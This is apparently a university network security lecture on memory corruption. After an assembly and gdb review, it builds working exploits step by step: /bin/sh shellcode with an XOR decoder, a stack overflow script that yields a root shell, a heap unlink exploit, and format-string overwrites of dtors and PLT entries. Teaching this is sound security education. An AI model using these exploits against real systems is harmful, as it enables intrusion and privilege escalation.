CS 4740/6740 Network Security: Lecture 7: Memory Corruption (Assembly Review, Basic Exploits)
Network Security
Lecture 7: Memory Corruption
(Assembly Review, Basic Exploits)
Assembly Review
Machine Model
Assembly Commands
Debugging
Assembly Review
-O0
abs:
push rbp
mov rbp, rsp
mov dword [rbp-0x8], edi
cmp dword [rbp-0x8], 0x0
jge .l0
mov eax, 0x0
sub eax, dword [rbp-0x8]
mov dword [rbp-0x4], eax
jmp .l1
.l0:
mov eax, dword [rbp-0x8]
mov dword [rbp-0x4], eax
.l1:
mov eax, dword [rbp-0x4]
pop rbp
ret
-O3
abs:
mov eax, edi
neg eax
cmovl eax, edi
ret
CPU and Memory
; ...might translate to
lea eax, [ebp-0x40]
mov edx, 0x04
mov ecx, 0x01
mov dword [eax+ecx*4], edx
Instruction Classes
Instructions commonly grouped by type of operation
Load/store, arithmetic, logic, comparison, control transfer
We'll go through a few common examples from each
Impossible to cover everything here
Compile programs, disassemble the output or capture assembly,
and investigate!
Loads, Stores
Instruction   Effect            Description
mov y, x      y <- x            Move x into y
test y, x     t <- y AND x      Perform logical AND, set SF if
              SF <- MSB(t)      MSB set in result, set ZF if
              ZF <- t = 0?      result is 0, ...
              ...
cmp y, x      t <- y - x        Perform signed subtraction,
              SF <- MSB(t)      set SF if MSB set in result, set
              ZF <- t = 0?      ZF if result is 0, ...
              ...
Control Transfers
Control transfers change the control flow of programs
Can be predicated on results of a prior comparison
Arithmetic, logic instructions also set flags
Distinction between jumps and calls
Jumps transfer control, calls used to implement procedures
Distinction between direct and indirect transfers
Direct transfers use relative offsets, indirect transfers are absolute
through a register or memory reference
Control Transfers (Jumps)
Instruction   Condition                  Description
jmp x         unconditional              Direct or indirect jump
je/jz x       ZF                         Jump if equal
jne/jnz x     not ZF                     Jump if not equal
jl x          SF != OF                   Jump if less (signed)
jle x         (SF != OF) or ZF           Jump if less or equal (signed)
jg x          (SF = OF) and not ZF       Jump if greater (signed)
jb x          CF                         Jump if below (unsigned)
ja x          not CF and not ZF          Jump if above (unsigned)
js x          SF                         Jump if negative
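The difference between the signed and unsigned conditions is easiest to see by computing the flags by hand. The following is a minimal sketch in Python, not part of the original slides: cmp_flags and the je/jl/jg/jb/ja helpers are hypothetical names, and only the four flags used in the table are modeled.

```python
def cmp_flags(y, x, width=32):
    """Model the flags set by `cmp y, x` (computes t = y - x, discards t)."""
    mask = (1 << width) - 1
    sign = 1 << (width - 1)
    y &= mask
    x &= mask
    t = (y - x) & mask
    return {
        'ZF': t == 0,                            # result is zero
        'SF': bool(t & sign),                    # MSB of the result
        'CF': y < x,                             # unsigned borrow
        'OF': bool((y ^ x) & (y ^ t) & sign),    # signed overflow
    }

def je(f): return f['ZF']
def jl(f): return f['SF'] != f['OF']
def jg(f): return f['SF'] == f['OF'] and not f['ZF']
def jb(f): return f['CF']
def ja(f): return not f['CF'] and not f['ZF']

# cmp -1, 1: less when read as signed, above when read as unsigned (0xffffffff)
flags = cmp_flags(-1, 1)
signed_less = jl(flags)
unsigned_above = ja(flags)
```

The same bit pattern takes different branches depending on whether the code uses jl/jg or jb/ja, which is one reason signedness mistakes matter for bounds checks.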
Procedures
Procedures (functions) are intrinsically linked to the stack
Provides space for local variables
Records where to return to
Used to pass arguments (sometimes)
Implemented using stack frames, or activation records
Control Transfers (Calls)
Instruction Condition Description
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
Calling Conventions
Standards for how procedures are called are known as calling conventions
Specify where arguments are passed (registers, stack)
Specify the caller and callee's responsibilities
Who deallocates argument space on stack?
Which registers can be clobbered by callee, who must save
them?
Why do we need standards?
Interoperability: code compiled by different toolchains must work
together
Calling Conventions
We often speak of callers and callees
Callers invoke a procedure (i.e., the call site)
Callees are invoked (i.e., the call target)
Conventions must specify how registers are dealt with
Could always save everything, but that's inefficient
Usually, some registers can be overwritten by the callee
(clobbered), others cannot
Registers that are clobbered are caller saved
Registers that must not be clobbered are callee saved
Calling Conventions
cdecl
cdecl is the Linux 32 bit calling convention
Arguments passed on the stack right to left (reverse order)
eax, edx, ecx are caller saved (i.e., can be clobbered)
Remaining registers are callee saved
Return value in eax
Caller deallocates arguments on stack after return
stdcall
stdcall is used by the Win32 API, among others
Almost identical to cdecl
However, the callee deallocates arguments on the stack
Can you think of a reason why this is better or worse than cdecl?
stdcall_fn:
; ...
pop ebp
ret 0x10 ; return and clean up arguments
SysV AMD64 ABI
x86_64 calling convention used on Linux, Solaris, FreeBSD, Mac OS X
First six (integer) arguments passed in registers rdi, rsi, rdx, rcx, r8,
r9
(Except syscalls, where r10 replaces rcx)
Additional arguments spill to stack
Return value in rax
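The register assignment above can be written down as a small lookup. This is a sketch in Python under simplifying assumptions: only integer and pointer arguments are considered, and place_args is a hypothetical helper name, not part of any toolchain.

```python
INT_ARG_REGS = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']

def place_args(args, syscall=False):
    """Return (register assignments, arguments spilled to the stack)."""
    regs = list(INT_ARG_REGS)
    if syscall:
        regs[3] = 'r10'          # syscalls use r10 in place of rcx
    placed = list(zip(regs, args))
    spilled = list(args[len(regs):])
    if syscall and spilled:
        # Linux syscalls take at most six arguments, all in registers
        raise ValueError('too many syscall arguments')
    return placed, spilled

# strncpy(buf, user, 16) -> rdi, rsi, rdx
placed, spilled = place_args(['buf', 'user', 16])
```

For the strncpy call in the following example this yields buf in rdi, user in rsi, and the length in rdx, with nothing spilled.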
SysV AMD64 ABI Example
int auth(const char* user) {
size_t i;
char buf[16];
strncpy(buf, user, sizeof(buf));
// ...
_auth:
push rbp ; save previous frame pointer
mov rbp, rsp ; set new frame pointer
sub rsp, 0x30 ; allocate space for locals
movabs rdx, 0x10 ; move sizeof(buf) to rdx
lea rax, [rbp-0x20] ; get the address of buf
mov qword [rbp-0x08], rdi ; move user pointer into stack
mov rsi, qword [rbp-0x08] ; mov user pointer back into rsi
mov rdi, rax ; move buf into rdi
call _strncpy ; call strncpy(rdi, rsi, rdx)
; ...
System Calls
System calls are special control flow transfers from program code to
OS code
Used to access OS-level APIs and devices
Accept parameters just like other procedures/functions
But the argument passing format is different
Change protection-level from Userland (Ring 3) to Kernel Mode
(Ring 0)
Also implemented using stack frames
But again, things are more complicated vs. intra-program control
flow transfers
System Calls
Instruction   Effect                                       Description
int x         esp <- esp - 4                               Push eip, code segment, flags, esp, and
              Mem(esp) <- Succ(eip)                        stack segment onto the stack. Disable
              esp <- esp - 4                               protected mode (by modifying flags).
              Mem(esp) <- cs                               Change eip to the address of the
              eflags <- eflags & DISABLE_PROTECTION_MASK   interrupt handler specified in the
              eip <- Addr(IVT[x])                          Interrupt Vector Table (IVT)
0000000000400230 <_start>:
400230: 48 c7 c7 00 00 00 00 mov rdi,0x0
400237: e8 e4 ff ff ff call 400220 <_exit@plt>
40023c: cc int3
Invoking Syscalls
bits 64 ; as before...
section .text
global _start
_start:
mov rdx, msg_len ; len(msg) to rdx
mov rsi, msg ; msg to rsi
mov rdi, 1 ; fd 1 (stdout) to rdi
mov rax, 1 ; write is syscall 1
syscall ; call write(rdi, rsi, rdx)
int3
section .data
Initial setup
Set default disassembly syntax
Display current instruction at each step
Control how gdb deals with programs that fork()
Also useful for setting breakpoints, scripting program execution to
known interesting state, etc.
Let's debug hello from before
Starting gdb
> gdb hello
GNU gdb (GDB) 7.8
[...]
(gdb) b _start
Breakpoint 1 at 0x4000b0
(gdb)
We load the program in gdb and set a breakpoint at _start
Breakpoints insert (by default) a software interrupt at the given
address (int3)
When int3 executes, control transfers to gdb
Original instruction is restored and executed
Then, the int3 is restored
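The save, patch, restore, re-arm cycle described above can be modeled on a byte array. The sketch below is an illustration in Python, not how gdb is implemented: BreakpointTable and its methods are hypothetical names, and the single-step of the restored instruction is only marked by a comment.

```python
INT3 = 0xCC  # one-byte encoding of the int3 instruction

class BreakpointTable:
    def __init__(self, memory):
        self.memory = memory   # bytearray standing in for the code segment
        self.saved = {}        # address -> original byte

    def insert(self, addr):
        """Remember the original byte and overwrite it with int3."""
        self.saved[addr] = self.memory[addr]
        self.memory[addr] = INT3

    def step_over(self, addr):
        """Restore the original byte, let it execute, then re-arm."""
        self.memory[addr] = self.saved[addr]
        executed = self.memory[addr]   # a real debugger single-steps here
        self.memory[addr] = INT3
        return executed

code = bytearray(b'\x90\x90\xc3')      # nop; nop; ret
bp = BreakpointTable(code)
bp.insert(1)
```

After insert(1) the second byte of code reads 0xCC, and step_over(1) briefly exposes the original 0x90 before putting the breakpoint back.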
Running the program
(gdb) r
Starting program: [...]/hello
Breakpoint 1, 0x00000000004000b0 in _start ()
1: x/i $rip
=> 0x4000b0 <_start>: movabs rdx,0x4
launch_shell:
sub rsp, byte 0x78
xor rcx, rcx
mov byte [rel pad], cl
lea rdi, [rel path]
mov qword [rsp+0x10], rdi
mov qword [rsp+0x18], rcx
mov qword [rsp+0x08], rcx
lea rsi, [rsp+0x10]
lea rdx, [rsp+0x08]
mov rax, rcx
mov al, byte 59
syscall
path db '/bin/sh'
pad db 0x0a
Shellcode Analysis
jmp .str ; jump to our string
.str_ret:
pop eax ; pop addr into eax
; ...
.str:
call .str_ret ; return to payload
db '/bin/sh' ; our string
_start:
xor rax, rax ; zero rax
mov rcx, rax ; zero rcx
mov cl, byte payload_len ; set decode length
mov rsi, key ; mov rsi, key
jmp .get_payload ; get payload addr
.payload_ret:
pop rdi ; pop addr
.decode:
mov rdx, qword [rdi+rax*8] ; load current qword
xor rdx, rsi ; decode it
mov qword [rdi+rax*8], rdx ; store decoded qword
inc rax ; increment index
loop .decode ; loop while rcx > 0
jmp .payload ; execute the payload
.get_payload:
call .payload_ret
.payload:
Encoded Payload
1. Uses the jmpcall trick to get the payload address
2. Loops over encoded payload, decodes qword chunks
A simple brute-force search will provide you a suitable key most of
the time
Decoders can be much more complex, of course
Added complexity not worth it here
But, decoders are highly useful in general
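The encoding side of this scheme, including the brute-force key search, might look like the following. This is a sketch under assumptions not stated on the slides: the payload is padded to whole qwords with NOPs, the only forbidden byte is 0x00 unless the caller says otherwise, and pad_to_qwords, xor_qwords, and find_key are hypothetical names (the ./xor tool used later is not shown in the lecture and may work differently).

```python
import struct

def pad_to_qwords(payload, filler=0x90):
    """Pad with NOPs so the decoder can work on whole 8-byte chunks."""
    return payload + bytes([filler]) * (-len(payload) % 8)

def xor_qwords(data, key):
    """XOR every little-endian qword with key; the same call decodes."""
    out = bytearray()
    for (qword,) in struct.iter_unpack('<Q', data):
        out += struct.pack('<Q', qword ^ key)
    return bytes(out)

def find_key(data, bad=b'\x00'):
    """Brute-force one key byte per qword position, avoiding bad bytes."""
    key_bytes = []
    for pos in range(8):
        column = data[pos::8]          # all bytes this key byte will touch
        for k in range(1, 256):
            if k not in bad and all((b ^ k) not in bad for b in column):
                key_bytes.append(k)
                break
        else:
            return None                # no usable key byte for this position
    return int.from_bytes(bytes(key_bytes), 'little')

raw = pad_to_qwords(b'/bin/sh\x00' + bytes(range(20)))
key = find_key(raw)
encoded = xor_qwords(raw, key)
```

Because XOR is its own inverse, xor_qwords(encoded, key) returns the padded payload, which is what the decoder loop above does one qword at a time.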
Locating the Shellcode
Enough shellcode tricks for now, let's finish the exploit
Where will we put the (possibly encoded) payload?
Since the stack is executable here, let's put it there
What's actually on the stack?
Stack Layout
Locating the Shellcode
In our case, we could go for either the frame copy, or the original
argument copy
What problem could we run into if we use the frame buffer copy?
Let's do the latter for this exploit
How to find the address of the argument buffer?
Could calculate it statically
But, it's faster to debug and pull out the addresses
Locating the Shellcode
> gcc -ggdb -O0 -fPIC -fPIE -fno-stack-protector -z execstack -o vuln vuln.c
> nasm -f bin -o payload.bin payload.asm
> nasm -f bin -o decoder.bin decoder.asm
> ./xor payload.bin 256 > payload.enc
> cat decoder.bin payload.enc > exploit
> gdb vuln
(gdb) b main
Breakpoint 1 at 0x4005d4
(gdb) r "$(cat exploit)"
[repeat below to step to strcpy call]
(gdb) si
0x400611 in main()
1: x/i $rip
=> 0x400611 <main+65>: call 0x4004c0 <strcpy@plt>
(gdb) si
[use finish to immediately return from strcpy]
(gdb) fin
(gdb) p/x $rax
$1 = 0x7fffffffe640
Locating the Saved IP
(gdb) x/2xg $rbp
0x7fffffffe750: 0x0000000000000000 0x00007ffff7a54b05
(gdb) p/x 0x7fffffffe758 - 0x7fffffffe640
$2 = 0x118
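import struct
import sys

buf_len = 0x118           # distance from buffer start to saved IP
ret_addr = 0x7fffffffea60
payload = open('exploit', 'rb').read()
# NOP sled, then payload, then the overwritten return address
buf = (b'\x90' * (buf_len - len(payload))) \
    + payload + struct.pack('<Q', ret_addr)
sys.stdout.buffer.write(buf)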
Finally
> gdb vuln
(gdb) r $(./exploit.py)
Starting program: [...]/stack/vuln $(./exploit.py)
????????????????????????????????????????????????????[...]
process 62743 is executing new program: /usr/bin/bash
warning: Could not load shared library symbols for linux-vdso.so.1.
Do you need set solib-search-path or set sysroot?
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
[...]
Smashing the Heap
Heap Data Structures
Exploit Construction
Heap-based Overflows
The stack isn't the only target for overflows
The heap is also a popular exploitation target
Completely different beast than stack-based overflows
Much more difficult due to (usually) non-deterministic shape of
heap
Many different types of heap overflows
We'll examine one prominent example
Heaps
char* buf = malloc(1024);
// ...
free(buf);
Yorktown (AIX)
RtlHeap (Windows)
phkmalloc (*BSD)
ptmalloc
Extremely popular malloc (default in glibc)
Stores memory management metadata inline with user data
Stored as small chunks before and after user chunks
(Where have we seen a scheme like this before?)
Aggressive optimizations
Maintains lists of free chunks binned by size
Merges consecutive free chunks to avoid fragmentation
Heap-based Overflows
First demonstrated by Solar Designer in 2000
JPEG COM marker processing vulnerability in Netscape
Proposed a generic way to exploit heap-based overflows
Idea: Attack the memory manager itself, taking advantage of
mixed data and control information
Generic since all programs on a platform usually use the default
system allocator
Heap Layout
The heap is divided into contiguous memory chunks
Chunks either allocated (in use by user) or free for allocation
Bordered by the wilderness
Each chunk can be split and combined as needed
No two free chunks can be adjacent
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
};
prev_size
If the previous chunk is free, contains its size
Otherwise, holds user data of the previous chunk
size
Equals the requested memory + sizeof(size), rounded up to the next
multiple of 8
3 LSBs are always free and used for status bits
e.g., PREV_INUSE, IS_MMAPPED
fd, bk
Pointers used to link free chunks into double-linked lists
Otherwise, contain user data
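The size rule and the status bits can be checked with a few lines of arithmetic. The sketch below follows the rule as stated on the slide (8-byte size field, rounding to a multiple of 8); real allocators add further rules, such as a minimum chunk size, which are ignored here. The function names are hypothetical; the PREV_INUSE and IS_MMAPPED bit values are the ones glibc uses.

```python
PREV_INUSE = 0x1   # previous chunk is allocated
IS_MMAPPED = 0x2   # chunk was obtained via mmap
FLAG_MASK = 0x7    # the three low bits reserved for status

def request_to_chunk_size(request, size_sz=8, align=8):
    """Requested bytes plus the size field, rounded up to the alignment."""
    return (request + size_sz + align - 1) & ~(align - 1)

def split_size_field(field):
    """Separate the real chunk size from the status bits."""
    return field & ~FLAG_MASK, bool(field & PREV_INUSE), bool(field & IS_MMAPPED)

size, prev_inuse, mmapped = split_size_field(65)
```

A size field of 65 (0x41) therefore describes a 64-byte chunk whose predecessor is in use.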
Allocated Chunk
Free Chunk
Contiguous Chunks
Memory Allocation
Free chunks are maintained in bins
Double-linked list of chunks
Bins organized by size
Allocation
Bins scanned in increasing order
Return a chunk of exact size, or split a larger one
Deallocation
If chunk borders the wilderness, it is consolidated
If adjacent chunks are free, they are consolidated
Consolidation removes old chunks and reinserts a larger merged chunk
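The consolidation rule can be illustrated on a toy heap. This is a deliberately simplified sketch: the heap is a Python list of (size, in_use) tuples in address order, bins and the wilderness are not modeled, and free_chunk is a hypothetical name.

```python
def free_chunk(chunks, i):
    """Mark chunk i free and merge it with free neighbours."""
    size, in_use = chunks[i]
    if not in_use:
        raise ValueError('chunk is already free')
    chunks[i] = (size, False)
    # merge with the following chunk if it is free
    if i + 1 < len(chunks) and not chunks[i + 1][1]:
        chunks[i] = (chunks[i][0] + chunks[i + 1][0], False)
        del chunks[i + 1]
    # merge with the preceding chunk if it is free
    if i > 0 and not chunks[i - 1][1]:
        chunks[i - 1] = (chunks[i - 1][0] + chunks[i][0], False)
        del chunks[i]
    return chunks

heap = [(32, True), (64, True), (48, True)]
free_chunk(heap, 0)
free_chunk(heap, 2)
free_chunk(heap, 1)   # both neighbours are free, so everything merges
```

After the third call the three chunks have collapsed into one free chunk, preserving the invariant that no two free chunks are adjacent. In a real allocator each merge unlinks the neighbour from its bin, which is the step the exploit targets.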
List Handling
#define unlink(P, BK, FD) { \
FD = P->fd; \
BK = P->bk; \
FD->bk = BK; \
BK->fd = FD; \
}
free(msg);
return 0;
}
Exploitation
Use gdb to find
1. Address of the saved IP for RecvMsg
2. Address of the msg buffer to place NOP sled and payload
Structure the chunks as in the classic unlink exploit
Make sure to include forward jump to bypass the clobbered section
of the NOP sled
Reuse the shellcode from the stack exploit as-is
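Why the fake chunk stores the saved IP address minus 24 becomes clear when the two writes performed by unlinking are simulated. The sketch below models memory as a Python dict of 8-byte words and assumes the 64-bit field offsets of struct malloc_chunk (fd at 16, bk at 24); unlink here is a Python stand-in for the allocator's list removal, and the chunk address is chosen only for illustration.

```python
FD_OFF = 16   # offset of fd with 8-byte prev_size and size
BK_OFF = 24   # offset of bk

def unlink(mem, p):
    """Remove chunk p from its doubly-linked list, trusting its pointers."""
    fd = mem[p + FD_OFF]
    bk = mem[p + BK_OFF]
    mem[fd + BK_OFF] = bk   # FD->bk = BK
    mem[bk + FD_OFF] = fd   # BK->fd = FD

addr_ret_addr = 0x7fffffffe7a8   # where the saved IP lives
ret_addr = 0x40c040              # where the NOP sled starts
fake_chunk = 0x40c110            # illustrative address of the forged chunk

mem = {
    fake_chunk + FD_OFF: addr_ret_addr - BK_OFF,
    fake_chunk + BK_OFF: ret_addr,
}
unlink(mem, fake_chunk)
```

The first write places ret_addr over the saved IP. The second write is a side effect: it stores addr_ret_addr - 24 at ret_addr + 16, inside the NOP sled, which is the clobbered section the forward jump has to skip.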
Exploitation
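import struct
import sys

addr_ret_addr = 0x7fffffffe7a8   # address of the saved IP
ret_addr = 0x40c040              # address of the NOP sled in msg
payload = open('payload.bin', 'rb').read()
# forged free chunk: unlinking it writes ret_addr over the saved IP
chk_w = (struct.pack('<qqqq', 1, 65, addr_ret_addr - 24, ret_addr)
         + (b'A' * 32))
chk_z = struct.pack('<qqqq', 1, 65, 0, 0) + (b'B' * 32)
buf = (struct.pack('<HH', 256, 256)
       + (b'\x90' * 48)
       + b'\xeb\x1e'             # short jump over the clobbered bytes
       + (b'\x90' * (206 - len(payload)))
       + payload
       + chk_w
       + chk_z
       + b'\n')
sys.stdout.buffer.write(buf)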
Inspecting the Heap
(gdb) c
Breakpoint 2, RecvMsg(sk=0) at vuln.cpp:28
28 free(msg);
(gdb) n
(gdb) x/32xg 0x40c040
0x40c040: 0x9090909090901eeb 0x9090909090909090
0x40c050: 0x00007fffffffe790 0x9090909090909090
0x40c060: 0x9090909090909090 0x9090909090909090
[...]
0x40c0c0: 0x9090909090909090 0x9090909090909090
0x40c0d0: 0x78ec834890909090 0x00002e0d88c93148
0x40c0e0: 0x000000203d8d4800 0x4c894810247c8948
0x40c0f0: 0x4808244c89481824 0x24548d481024748d
0x40c100: 0x050f3bb0c8894808 0x0168732f6e69622f
0x40c110: 0x0000000000000001 0x0000000000000041
0x40c120: 0x00007fffffffe790 0x000000000040c040
0x40c130: 0x4141414141414141 0x4141414141414141
Comments
Exploiting the heap is more difficult than the stack
Heap layout depends on runtime behavior of the program
Depending on program inputs, chunks might or might not be
allocated in the required pattern
And, location of chunks might be unpredictable
(Problematic if payload is on the heap)
Some techniques exist to mitigate these difficulties
Allocating many chunks
Heap spraying (more later)
More Vulnerabilities
Integer Overflows
Format Strings
Function Pointers, PLT, dtors, vtables
More Vulnerabilities
The stack and the heap are classic exploitation targets, but by no
means the only ones
In this section, we'll cover some more major classes
Integer overflows
Format strings
Function pointers
Integer Overflows
Class of bugs resulting from limitations of integer representations
Integer overflows don't directly lead to buffer overflows
But, can be used to bypass bounds checks
Can result in unintended execution paths or incorrect computations
with security implications
Integer Representation
Recall that integers are represented as fixed-width binary numbers
Arithmetic performed mod 2^W
What happens when an integer is too large to represent?
Undefined behavior for signed integers in C (unsigned arithmetic wraps)
Compilers can do anything they like with signed overflow!
In practice, overflows are ignored, and computation continues
Perhaps with incorrect results...
Integer Overflows
x = 0xffffffff;
y = 1;
r = x + y;
Width Overflows
uint32_t x = 0x10000;
uint16_t y = 1;
uint16_t z = x + y; // z = ?
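Both examples can be worked through by masking to the destination width. Python integers do not overflow, so the sketch below reproduces fixed-width unsigned arithmetic explicitly; wrap and the length check are hypothetical illustrations, not code from the lecture.

```python
def wrap(value, width):
    """Reduce value mod 2^width, as fixed-width unsigned arithmetic does."""
    return value & ((1 << width) - 1)

# 32-bit addition: 0xffffffff + 1 wraps around to 0
r = wrap(0xffffffff + 1, 32)

# width overflow: 0x10000 + 1 stored in a 16-bit variable keeps only the low bits
z = wrap(0x10000 + 1, 16)

def passes_length_check(n, limit=16):
    """A flawed check that computes n + 1 in 32 bits before comparing."""
    return wrap(n + 1, 32) <= limit

bypassed = passes_length_check(0xffffffff)
```

Here r is 0 and z is 1. The last function shows how a wrapped sum can slip past a bounds check even though n itself is far larger than the limit.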
$ python gen_fmt_str.py
XXXXXXXX%04361x%6$hn%08465x%7$hn
We'll use a format string exploit to overwrite the PLT entry for printf
Exploitation
(gdb) x/3i printf@plt
0x80484a0: jmp DWORD PTR ds:0x80499ec
0x80484a6: push 0x18
0x80484ab: jmp 0x8048460
The compiler automatically registered our init and fini functions for
execution as constructors and destructors
Initialization and finalization are handled by the C runtime (part of
libc)
_start
_start:
xor ebp, ebp ; clear frame pointer
pop esi ; get argc
mov ecx, esp ; get argv
and esp, 0xfffffff0 ; align the stack
push eax
push esp
push edx
push 0x80487b0 ; push __libc_csu_fini
push 0x8048740 ; push __libc_csu_init
push ecx ; push argv
push esi ; push argc
push 0x80486a0 ; push main
call 0x8048470 ; call __libc_start_main
__libc_csu_init
__libc_csu_init:
; ...
.loop:
mov eax, dword [esp+0x38]
mov dword [esp], ebp
mov dword [esp+0x08], eax
mov eax, dword [esp+0x34]
mov dword [esp+0x04], eax
call dword [ebx+edi*4+0x38]
add edi, 0x01
cmp edi, esi
jne .loop
; ...
ctors
(gdb) x/4xw $ebx + 0x38
0x8049acc: 0x08048610 0x08048640 0x08048530 0x00000000
(gdb) disas 0x08048610
Dump of code for function frame_dummy:
[...]
(gdb) disas 0x08048640
Dump of code for function vuln_init():
[...]
(gdb) disas 0x08048530
Dump of code for function _GLOBAL__I_a:
[...]
dtors
For an attacker, dtors are a more attractive target
Usually, ctors have already executed, so overwriting a ctor pointer
wouldn't have any effect
dtors are also stored in a vector of function pointers
Not executed by __libc_csu_fini, instead by glibc
dtors
Breakpoint 4, vuln_fini () at vuln.cpp:14
14 printf("cleaning up\n");
1: x/i $eip
=> 0x8048689: mov DWORD PTR [esp],ecx
(gdb) bt
#0 vuln_fini ()
#1 0xf7feb60c in _dl_fini ()
#2 0xf7cfc721 in __run_exit_handlers ()
#3 0xf7cfc77d in exit ()
#4 0xf7ce499b in __libc_start_main ()
#5 0x0804856f in _start ()
dl_fini
(gdb) x/8i 0xf7feb606
0xf7feb606: mov esi,eax
0xf7feb608: call DWORD PTR [edi+esi*4-0x4]
0xf7feb60c: sub esi,0x1
0xf7feb60f: jne 0xf7feb608 <_dl_fini+472>
(gdb) x/2xw $edi
0x8049ac4: 0x080485f0 0x08048670
(gdb) disas 0x080485f0
Dump of code for function __do_global_dtors_aux: [...]
(gdb) disas 0x08048670
Dump of code for function vuln_fini():
[...]
Exploitation
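import struct
import sys

# padding widths: 8 bytes of addresses are already printed
v0 = 0x1111 - 8
v1 = 0x2222 - v0 - 8
base_addr = 0x8049ac8
base_off = 6
# the two target addresses, low half first
buf = struct.pack('<II', base_addr, base_addr + 2)
buf += '%0{0}x%{2}$hn%0{1}x%{3}$hn'.format(
    v0,
    v1,
    base_off,
    base_off + 1).encode('ascii')
sys.stdout.buffer.write(buf)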
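The padding arithmetic generalizes to any 32-bit value, including ones whose high half is smaller than the low half. The following sketch assumes the same layout as the script above (two 4-byte addresses at the start of the output, reachable as consecutive positional arguments) and that each %x conversion prints a 32-bit value; build_hn_write is a hypothetical helper name.

```python
import struct

def build_hn_write(addr, value, first_arg, prefix_len=8):
    """Format string that writes a 32-bit value to addr using two %hn writes."""
    written = prefix_len                     # bytes printed before the first %x
    parts = []
    for i, half in enumerate((value & 0xffff, value >> 16)):
        pad = (half - written) % 0x10000     # %hn only stores the low 16 bits
        if pad < 8:
            pad += 0x10000                   # width must cover all 8 hex digits
        parts.append('%0{}x%{}$hn'.format(pad, first_arg + i))
        written += pad
    return struct.pack('<II', addr, addr + 2) + ''.join(parts).encode('ascii')

fmt = build_hn_write(0x8049ac8, 0x22221111, 6)
```

For the value 0x22221111 this produces the same widths as v0 and v1 above. When the high half is smaller than the running count, the modulo lets the 16-bit counter wrap instead of producing a negative width.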
Exploitation
(gdb) r $(cat input)
starting up
buf = [...]
Program received signal SIGSEGV, Segmentation fault.
0x22221111 in ?? ()
1: x/i $eip
=> 0x22221111: <error: Cannot access memory at 0x22221111>
vtables
Let's look at one more example of function pointers
C++ makes heavy use of function pointers
Think virtual functions
Which method is invoked can depend on the dynamic type of an
object
As usual, the solution is indirection
Objects contain a pointer to a vtable, a vector of function pointers to
implementations of virtual methods for that object's class
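The indirection can be modeled without a C++ compiler. In the sketch below, written in Python purely for illustration, a vtable is a list of functions and an object is a dict holding a vptr entry that refers to its class's table; all names are hypothetical.

```python
def base_name(obj):
    return 'Base'

def derived_name(obj):
    return 'Derived'

BASE_VTABLE = [base_name]         # slot 0: name()
DERIVED_VTABLE = [derived_name]   # overrides slot 0

def virtual_call(obj, slot):
    """Look up the method through the object's vtable pointer, then call it."""
    return obj['vptr'][slot](obj)

obj = {'vptr': DERIVED_VTABLE}
before = virtual_call(obj, 0)

# An attacker who can overwrite the vptr controls every later virtual call
obj['vptr'] = [lambda o: 'attacker code']
after = virtual_call(obj, 0)
```

The call site never changes. Only the pointer stored in the object does, which is what makes vtable pointers an attractive target for memory corruption.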
vtables
class Base {
public:
virtual ~Base(void) {
}